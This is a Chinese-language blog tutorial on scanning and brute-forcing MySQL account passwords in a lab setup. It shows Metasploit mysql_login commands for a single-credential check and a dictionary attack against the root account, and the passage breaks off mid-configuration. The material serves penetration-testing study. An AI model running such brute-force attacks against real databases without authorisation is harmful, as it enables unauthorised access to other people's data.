6.服务器安全攻防之MySQL账号扫描及攻击

 对于MySQL数据库渗透来说,获取其口令至关重要,一般来讲数据库不会提供对外连接,安全严格的将会限制固有IP和本机登录数据库,但渗透就是发现各种例外!抱着研究的目地,将目前市面上主流的7款MySQL口令扫描工具进行实际测试,并给出了实际利用场景的具体命令,在进行渗透测试时,具有较高的参考价值。

1.测试环境:Windows 2003 Server +PHP+MySQL5.0.90-community-nt
2.账号设置:允许远程访问也即设置host为%,同时密码设置为11111111。
3.测试机:kali linux2017和windows 2003
6.1 Metasploit扫描MySQL口令
有关利用Metasploit扫描详细利用可以参考本人网上发布的《利用Msf辅助模块检测和渗透Mysql》,这里主要是介绍如何扫描MySQL口令。
1.启动Metasploit命令
在kali终端下输入:msfconsole
2. 密码扫描auxiliary/scanner/mysql/mysql_login模块
(1)单一模式扫描登录验证
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.157.130
set username root
set password 11111111
run
(2)使用字典对某个IP地址进行暴力破解
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.157.130
set pass_file “/root/top10000pwd.txt”
set username root

上一篇:【漏洞工具】Metasploit框架爆破模块


下一篇:启动metasploit显示failed to start metasploit.service: Unit metasploit.service not found.